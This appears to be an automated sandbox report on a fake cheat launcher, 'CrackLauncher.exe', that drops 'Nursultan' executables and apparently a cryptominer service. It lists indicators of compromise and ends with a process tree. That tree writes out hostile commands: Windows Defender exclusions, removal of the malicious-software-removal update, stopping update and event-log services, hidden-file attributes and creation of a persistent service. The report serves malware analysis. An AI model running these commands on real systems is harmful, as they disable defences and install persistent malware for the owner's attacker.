Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan Setup = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan Setup.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Запустить Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Запустить Nursultan.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan Setup = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan Setup.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan Setup = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan Setup.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan Setup = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan Setup.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan Setup = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan Setup.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Запустить Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Запустить Nursultan.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Запустить Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Запустить Nursultan.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan Setup = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan Setup.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan Setup = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan Setup.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Запустить Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Запустить Nursultan.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Запустить Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Запустить Nursultan.exe"	CrackLauncher.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 14 IoCs

Web Service

T1102

flow	ioc
17	discord.com
35	discord.com
51	discord.com
52	discord.com
18	discord.com
26	discord.com
42	discord.com
43	discord.com
76	discord.com
8	discord.com
9	discord.com
34	discord.com
77	discord.com
27	discord.com

Looks up external IP address via web service 7 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
13	ip-api.com
24	ip-api.com
32	ip-api.com
40	ip-api.com
48	ip-api.com
74	ip-api.com
6	ip-api.com

Power Settings 1 TTPs 56 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
2248	powercfg.exe
2012	powercfg.exe
1140	powercfg.exe
1880	powercfg.exe
2432	powercfg.exe
1932	powercfg.exe
1836	powercfg.exe
2804	powercfg.exe
300	powercfg.exe
1716	powercfg.exe
1936	powercfg.exe
2192	powercfg.exe
2836	powercfg.exe
1704	powercfg.exe
2556	powercfg.exe
1884	powercfg.exe
2264	powercfg.exe
1552	powercfg.exe
832	powercfg.exe
1552	powercfg.exe
1936	powercfg.exe
1704	powercfg.exe
2180	powercfg.exe
2796	powercfg.exe
1260	powercfg.exe
2112	powercfg.exe
2108	powercfg.exe
1136	powercfg.exe
1984	powercfg.exe
2112	powercfg.exe
1992	powercfg.exe
2980	powercfg.exe
684	powercfg.exe
3032	powercfg.exe
1532	powercfg.exe
840	powercfg.exe
2112	powercfg.exe
1456	powercfg.exe
1956	powercfg.exe
1216	powercfg.exe
2584	powercfg.exe
2220	powercfg.exe
1776	powercfg.exe
568	powercfg.exe
2208	powercfg.exe
1924	powercfg.exe
3020	powercfg.exe
2960	powercfg.exe
1880	powercfg.exe
1372	powercfg.exe
1888	powercfg.exe
2796	powercfg.exe
948	powercfg.exe
832	powercfg.exe
2220	powercfg.exe
3000	powercfg.exe

Drops file in System32 directory 28 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\system32\MRT.exe	Nursultan Setup.exe
File opened for modification	C:\Windows\system32\MRT.exe	jqvljmboayxs.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\system32\MRT.exe	Nursultan Setup.exe
File opened for modification	C:\Windows\system32\MRT.exe	jqvljmboayxs.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\system32\MRT.exe	jqvljmboayxs.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\system32\MRT.exe	Nursultan Setup.exe
File opened for modification	C:\Windows\system32\MRT.exe	jqvljmboayxs.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\system32\MRT.exe	Nursultan Setup.exe
File opened for modification	C:\Windows\system32\MRT.exe	Nursultan Setup.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\system32\MRT.exe	Nursultan Setup.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\system32\MRT.exe	jqvljmboayxs.exe
File opened for modification	C:\Windows\system32\MRT.exe	jqvljmboayxs.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\system32\MRT.exe	jqvljmboayxs.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\system32\MRT.exe	Nursultan Setup.exe

Suspicious use of SetThreadContext 42 IoCs

description	pid	Process	procid_target
PID 2528 set thread context of 2780	2528	Nursultan.exe	38
PID 2128 set thread context of 300	2128	Nursultan.exe	57
PID 896 set thread context of 2124	896	Nursultan.exe	94
PID 2548 set thread context of 2520	2548	Nursultan.exe	199
PID 2936 set thread context of 2444	2936	Nursultan.exe	141
PID 2060 set thread context of 764	2060	jqvljmboayxs.exe	193
PID 2060 set thread context of 2288	2060	jqvljmboayxs.exe	196
PID 1852 set thread context of 2220	1852	Nursultan.exe	217
PID 1368 set thread context of 2492	1368	Nursultan.exe	241
PID 1780 set thread context of 1660	1780	Nursultan.exe	260
PID 2348 set thread context of 840	2348	Nursultan.exe	342
PID 1984 set thread context of 2520	1984	Nursultan.exe	305
PID 1072 set thread context of 1032	1072	Nursultan.exe	382
PID 1620 set thread context of 1888	1620	Nursultan.exe	401
PID 3020 set thread context of 1492	3020	Nursultan.exe	427
PID 2804 set thread context of 2660	2804	Nursultan.exe	441
PID 664 set thread context of 1936	664	Nursultan.exe	455
PID 3052 set thread context of 2900	3052	Nursultan.exe	468
PID 2620 set thread context of 2844	2620	Nursultan.exe	479
PID 1784 set thread context of 2980	1784	Nursultan.exe	539
PID 2212 set thread context of 1596	2212	Nursultan.exe	550
PID 2736 set thread context of 1508	2736	Nursultan.exe	561
PID 1628 set thread context of 1364	1628	Nursultan.exe	572
PID 1968 set thread context of 1284	1968	Nursultan.exe	585
PID 1544 set thread context of 1968	1544	Nursultan.exe	645
PID 1568 set thread context of 2572	1568	Nursultan.exe	657
PID 1372 set thread context of 1744	1372	Nursultan.exe	669
PID 2796 set thread context of 1956	2796	Nursultan.exe	680
PID 1468 set thread context of 2440	1468	Nursultan.exe	704
PID 2108 set thread context of 1820	2108	Nursultan.exe	715
PID 2408 set thread context of 2108	2408	Nursultan.exe	775
PID 320 set thread context of 2688	320	Nursultan.exe	786
PID 1220 set thread context of 1284	1220	Nursultan.exe	822
PID 564 set thread context of 288	564	Nursultan.exe	833
PID 2848 set thread context of 1544	2848	Nursultan.exe	844
PID 296 set thread context of 1364	296	Nursultan.exe	870
PID 1776 set thread context of 1800	1776	Nursultan.exe	917
PID 2256 set thread context of 1356	2256	Nursultan.exe	928
PID 3048 set thread context of 2012	3048	Nursultan.exe	939
PID 2584 set thread context of 2644	2584	Nursultan.exe	950
PID 2548 set thread context of 2208	2548	Nursultan.exe	963
PID 2400 set thread context of 2260	2400	Nursultan.exe	1023

Drops file in Windows directory 14 IoCs

description	ioc	Process
File created	C:\Windows\wusa.lock	wusa.exe
File created	C:\Windows\wusa.lock	wusa.exe
File created	C:\Windows\wusa.lock	wusa.exe
File created	C:\Windows\wusa.lock	wusa.exe
File created	C:\Windows\wusa.lock	wusa.exe
File created	C:\Windows\wusa.lock	wusa.exe
File created	C:\Windows\wusa.lock	wusa.exe
File created	C:\Windows\wusa.lock	wusa.exe
File created	C:\Windows\wusa.lock	wusa.exe
File created	C:\Windows\wusa.lock	wusa.exe
File created	C:\Windows\wusa.lock	wusa.exe
File created	C:\Windows\wusa.lock	wusa.exe
File created	C:\Windows\wusa.lock	wusa.exe
File created	C:\Windows\wusa.lock	wusa.exe

Launches sc.exe 64 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2572	sc.exe
1316	sc.exe
2292	sc.exe
2712	sc.exe
1684	sc.exe
1832	sc.exe
1568	sc.exe
1368	sc.exe
2772	sc.exe
2244	sc.exe
2736	sc.exe
1852	sc.exe
2492	sc.exe
2008	sc.exe
1632	sc.exe
2296	sc.exe
316	sc.exe
868	sc.exe
2456	sc.exe
3020	sc.exe
2228	sc.exe
1496	sc.exe
1996	sc.exe
2960	sc.exe
2336	sc.exe
3016	sc.exe
320	sc.exe
1812	sc.exe
2700	sc.exe
1496	sc.exe
1692	sc.exe
2496	sc.exe
2272	sc.exe
2576	sc.exe
1632	sc.exe
2856	sc.exe
2436	sc.exe
2620	sc.exe
2868	sc.exe
2168	sc.exe
2712	sc.exe
2084	sc.exe
1320	sc.exe
680	sc.exe
3020	sc.exe
940	sc.exe
1648	sc.exe
2460	sc.exe
1032	sc.exe
2488	sc.exe
2304	sc.exe
1836	sc.exe
2428	sc.exe
2180	sc.exe
3044	sc.exe
1488	sc.exe
2436	sc.exe
1868	sc.exe
2620	sc.exe
580	sc.exe
1748	sc.exe
2628	sc.exe
3048	sc.exe
896	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Detects videocard installed 1 TTPs 7 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
532	wmic.exe
2776	wmic.exe
1232	wmic.exe
532	wmic.exe
2276	wmic.exe
1256	wmic.exe
772	wmic.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = d09f202265cada01	powershell.exe

Runs ping.exe 1 TTPs 7 IoCs

Remote System Discovery

T1018

pid	Process
2032	PING.EXE
3044	PING.EXE
2216	PING.EXE
2864	PING.EXE
1544	PING.EXE
344	PING.EXE
1936	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
1632	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3004	powershell.exe
2840	powershell.exe
2320	powershell.exe
948	powershell.exe
1748	powershell.exe
1296	powershell.exe
772	powershell.exe
2200	powershell.exe
1464	powershell.exe
1888	powershell.exe
2420	powershell.exe
2744	powershell.exe
2320	powershell.exe
2764	powershell.exe
1532	powershell.exe
2376	powershell.exe
2216	powershell.exe
2780	MSBuild.exe
1576	powershell.exe
1584	powershell.exe
2888	powershell.exe
2488	powershell.exe
2484	powershell.exe
2540	powershell.exe
2960	powershell.exe
1192	powershell.exe
1616	powershell.exe
780	powershell.exe
2680	Nursultan Setup.exe
2620	powershell.exe
2172	powershell.exe
1320	powershell.exe
2680	Nursultan Setup.exe
2680	Nursultan Setup.exe
2680	Nursultan Setup.exe
2680	Nursultan Setup.exe
2680	Nursultan Setup.exe
2680	Nursultan Setup.exe
2680	Nursultan Setup.exe
2680	Nursultan Setup.exe
2680	Nursultan Setup.exe
2680	Nursultan Setup.exe
2680	Nursultan Setup.exe
2680	Nursultan Setup.exe
2680	Nursultan Setup.exe
2680	Nursultan Setup.exe
2060	jqvljmboayxs.exe
2400	powershell.exe
2060	jqvljmboayxs.exe
2060	jqvljmboayxs.exe
2060	jqvljmboayxs.exe
2060	jqvljmboayxs.exe
2060	jqvljmboayxs.exe
2060	jqvljmboayxs.exe
2060	jqvljmboayxs.exe
2060	jqvljmboayxs.exe
2060	jqvljmboayxs.exe
2060	jqvljmboayxs.exe
2060	jqvljmboayxs.exe
2060	jqvljmboayxs.exe
564	powershell.exe
2672	powershell.exe
1252	powershell.exe
2152	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3004	powershell.exe
Token: SeDebugPrivilege	2840	powershell.exe
Token: SeDebugPrivilege	2320	powershell.exe
Token: SeDebugPrivilege	2784	Запустить Nursultan.exe
Token: SeDebugPrivilege	2780	MSBuild.exe
Token: SeDebugPrivilege	948	powershell.exe
Token: SeDebugPrivilege	1748	powershell.exe
Token: SeDebugPrivilege	1296	powershell.exe
Token: SeDebugPrivilege	772	powershell.exe
Token: SeDebugPrivilege	2200	powershell.exe
Token: SeDebugPrivilege	300	MSBuild.exe
Token: SeDebugPrivilege	1464	powershell.exe
Token: SeDebugPrivilege	1888	powershell.exe
Token: SeDebugPrivilege	2420	powershell.exe
Token: SeIncreaseQuotaPrivilege	2572	wmic.exe
Token: SeSecurityPrivilege	2572	wmic.exe
Token: SeTakeOwnershipPrivilege	2572	wmic.exe
Token: SeLoadDriverPrivilege	2572	wmic.exe
Token: SeSystemProfilePrivilege	2572	wmic.exe
Token: SeSystemtimePrivilege	2572	wmic.exe
Token: SeProfSingleProcessPrivilege	2572	wmic.exe
Token: SeIncBasePriorityPrivilege	2572	wmic.exe
Token: SeCreatePagefilePrivilege	2572	wmic.exe
Token: SeBackupPrivilege	2572	wmic.exe
Token: SeRestorePrivilege	2572	wmic.exe
Token: SeShutdownPrivilege	2572	wmic.exe
Token: SeDebugPrivilege	2572	wmic.exe
Token: SeSystemEnvironmentPrivilege	2572	wmic.exe
Token: SeRemoteShutdownPrivilege	2572	wmic.exe
Token: SeUndockPrivilege	2572	wmic.exe
Token: SeManageVolumePrivilege	2572	wmic.exe
Token: 33	2572	wmic.exe
Token: 34	2572	wmic.exe
Token: 35	2572	wmic.exe
Token: SeIncreaseQuotaPrivilege	2572	wmic.exe
Token: SeSecurityPrivilege	2572	wmic.exe
Token: SeTakeOwnershipPrivilege	2572	wmic.exe
Token: SeLoadDriverPrivilege	2572	wmic.exe
Token: SeSystemProfilePrivilege	2572	wmic.exe
Token: SeSystemtimePrivilege	2572	wmic.exe
Token: SeProfSingleProcessPrivilege	2572	wmic.exe
Token: SeIncBasePriorityPrivilege	2572	wmic.exe
Token: SeCreatePagefilePrivilege	2572	wmic.exe
Token: SeBackupPrivilege	2572	wmic.exe
Token: SeRestorePrivilege	2572	wmic.exe
Token: SeShutdownPrivilege	2572	wmic.exe
Token: SeDebugPrivilege	2572	wmic.exe
Token: SeSystemEnvironmentPrivilege	2572	wmic.exe
Token: SeRemoteShutdownPrivilege	2572	wmic.exe
Token: SeUndockPrivilege	2572	wmic.exe
Token: SeManageVolumePrivilege	2572	wmic.exe
Token: 33	2572	wmic.exe
Token: 34	2572	wmic.exe
Token: 35	2572	wmic.exe
Token: SeIncreaseQuotaPrivilege	2716	wmic.exe
Token: SeSecurityPrivilege	2716	wmic.exe
Token: SeTakeOwnershipPrivilege	2716	wmic.exe
Token: SeLoadDriverPrivilege	2716	wmic.exe
Token: SeSystemProfilePrivilege	2716	wmic.exe
Token: SeSystemtimePrivilege	2716	wmic.exe
Token: SeProfSingleProcessPrivilege	2716	wmic.exe
Token: SeIncBasePriorityPrivilege	2716	wmic.exe
Token: SeCreatePagefilePrivilege	2716	wmic.exe
Token: SeBackupPrivilege	2716	wmic.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
2780	MSBuild.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2248 wrote to memory of 3004	2248	CrackLauncher.exe	28
PID 2248 wrote to memory of 3004	2248	CrackLauncher.exe	28
PID 2248 wrote to memory of 3004	2248	CrackLauncher.exe	28
PID 2248 wrote to memory of 2680	2248	CrackLauncher.exe	30
PID 2248 wrote to memory of 2680	2248	CrackLauncher.exe	30
PID 2248 wrote to memory of 2680	2248	CrackLauncher.exe	30
PID 2248 wrote to memory of 2840	2248	CrackLauncher.exe	31
PID 2248 wrote to memory of 2840	2248	CrackLauncher.exe	31
PID 2248 wrote to memory of 2840	2248	CrackLauncher.exe	31
PID 2248 wrote to memory of 2784	2248	CrackLauncher.exe	33
PID 2248 wrote to memory of 2784	2248	CrackLauncher.exe	33
PID 2248 wrote to memory of 2784	2248	CrackLauncher.exe	33
PID 2248 wrote to memory of 2320	2248	CrackLauncher.exe	34
PID 2248 wrote to memory of 2320	2248	CrackLauncher.exe	34
PID 2248 wrote to memory of 2320	2248	CrackLauncher.exe	34
PID 2248 wrote to memory of 2528	2248	CrackLauncher.exe	36
PID 2248 wrote to memory of 2528	2248	CrackLauncher.exe	36
PID 2248 wrote to memory of 2528	2248	CrackLauncher.exe	36
PID 2248 wrote to memory of 2528	2248	CrackLauncher.exe	36
PID 2248 wrote to memory of 1616	2248	CrackLauncher.exe	37
PID 2248 wrote to memory of 1616	2248	CrackLauncher.exe	37
PID 2248 wrote to memory of 1616	2248	CrackLauncher.exe	37
PID 2528 wrote to memory of 2780	2528	Nursultan.exe	38
PID 2528 wrote to memory of 2780	2528	Nursultan.exe	38
PID 2528 wrote to memory of 2780	2528	Nursultan.exe	38
PID 2528 wrote to memory of 2780	2528	Nursultan.exe	38
PID 2528 wrote to memory of 2780	2528	Nursultan.exe	38
PID 2528 wrote to memory of 2780	2528	Nursultan.exe	38
PID 2528 wrote to memory of 2780	2528	Nursultan.exe	38
PID 2528 wrote to memory of 2780	2528	Nursultan.exe	38
PID 2528 wrote to memory of 2780	2528	Nursultan.exe	38
PID 1616 wrote to memory of 948	1616	CrackLauncher.exe	39
PID 1616 wrote to memory of 948	1616	CrackLauncher.exe	39
PID 1616 wrote to memory of 948	1616	CrackLauncher.exe	39
PID 2784 wrote to memory of 2388	2784	Запустить Nursultan.exe	41
PID 2784 wrote to memory of 2388	2784	Запустить Nursultan.exe	41
PID 2784 wrote to memory of 2388	2784	Запустить Nursultan.exe	41
PID 2784 wrote to memory of 1296	2784	Запустить Nursultan.exe	43
PID 2784 wrote to memory of 1296	2784	Запустить Nursultan.exe	43
PID 2784 wrote to memory of 1296	2784	Запустить Nursultan.exe	43
PID 1616 wrote to memory of 1484	1616	CrackLauncher.exe	45
PID 1616 wrote to memory of 1484	1616	CrackLauncher.exe	45
PID 1616 wrote to memory of 1484	1616	CrackLauncher.exe	45
PID 1616 wrote to memory of 1748	1616	CrackLauncher.exe	46
PID 1616 wrote to memory of 1748	1616	CrackLauncher.exe	46
PID 1616 wrote to memory of 1748	1616	CrackLauncher.exe	46
PID 1616 wrote to memory of 532	1616	CrackLauncher.exe	48
PID 1616 wrote to memory of 532	1616	CrackLauncher.exe	48
PID 1616 wrote to memory of 532	1616	CrackLauncher.exe	48
PID 1616 wrote to memory of 2200	1616	CrackLauncher.exe	49
PID 1616 wrote to memory of 2200	1616	CrackLauncher.exe	49
PID 1616 wrote to memory of 2200	1616	CrackLauncher.exe	49
PID 2784 wrote to memory of 772	2784	Запустить Nursultan.exe	50
PID 2784 wrote to memory of 772	2784	Запустить Nursultan.exe	50
PID 2784 wrote to memory of 772	2784	Запустить Nursultan.exe	50
PID 1616 wrote to memory of 2128	1616	CrackLauncher.exe	53
PID 1616 wrote to memory of 2128	1616	CrackLauncher.exe	53
PID 1616 wrote to memory of 2128	1616	CrackLauncher.exe	53
PID 1616 wrote to memory of 2128	1616	CrackLauncher.exe	53
PID 1616 wrote to memory of 3044	1616	CrackLauncher.exe	54
PID 1616 wrote to memory of 3044	1616	CrackLauncher.exe	54
PID 1616 wrote to memory of 3044	1616	CrackLauncher.exe	54
PID 2780 wrote to memory of 1888	2780	MSBuild.exe	55
PID 2780 wrote to memory of 1888	2780	MSBuild.exe	55

Views/modifies file attributes 1 TTPs 7 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2520	attrib.exe
2112	attrib.exe
448	attrib.exe
1880	attrib.exe
2076	attrib.exe
2388	attrib.exe
2172	attrib.exe

C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
1⤵
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:2248
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3004
- C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
  "C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  PID:2680
- - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    PID:1320
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:2568
  - - C:\Windows\system32\wusa.exe
      wusa /uninstall /kb:890830 /quiet /norestart
      4⤵
      Drops file in Windows directory
      PID:2540
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop UsoSvc
    3⤵
    PID:2312
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop WaaSMedicSvc
    3⤵
    PID:1648
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop wuauserv
    3⤵
    - Launches sc.exe
    PID:1032
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop bits
    3⤵
    PID:1536
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop dosvc
    3⤵
    - Launches sc.exe
    PID:2180
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
    3⤵
    - Power Settings
    PID:2012
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
    3⤵
    - Power Settings
    PID:832
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
    3⤵
    - Power Settings
    PID:948
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
    3⤵
    - Power Settings
    PID:2220
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe delete "XMRKNZQC"
    3⤵
    - Launches sc.exe
    PID:2168
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe create "XMRKNZQC" binpath= "C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe" start= "auto"
    3⤵
    - Launches sc.exe
    PID:3016
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop eventlog
    3⤵
    - Launches sc.exe
    PID:1832
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe start "XMRKNZQC"
    3⤵
    PID:1260
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2840
- C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
  "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
  2⤵
  - Drops file in Drivers directory
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2784
- - C:\Windows\system32\attrib.exe
    "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
    3⤵
    - Views/modifies file attributes
    PID:2388
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1296
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
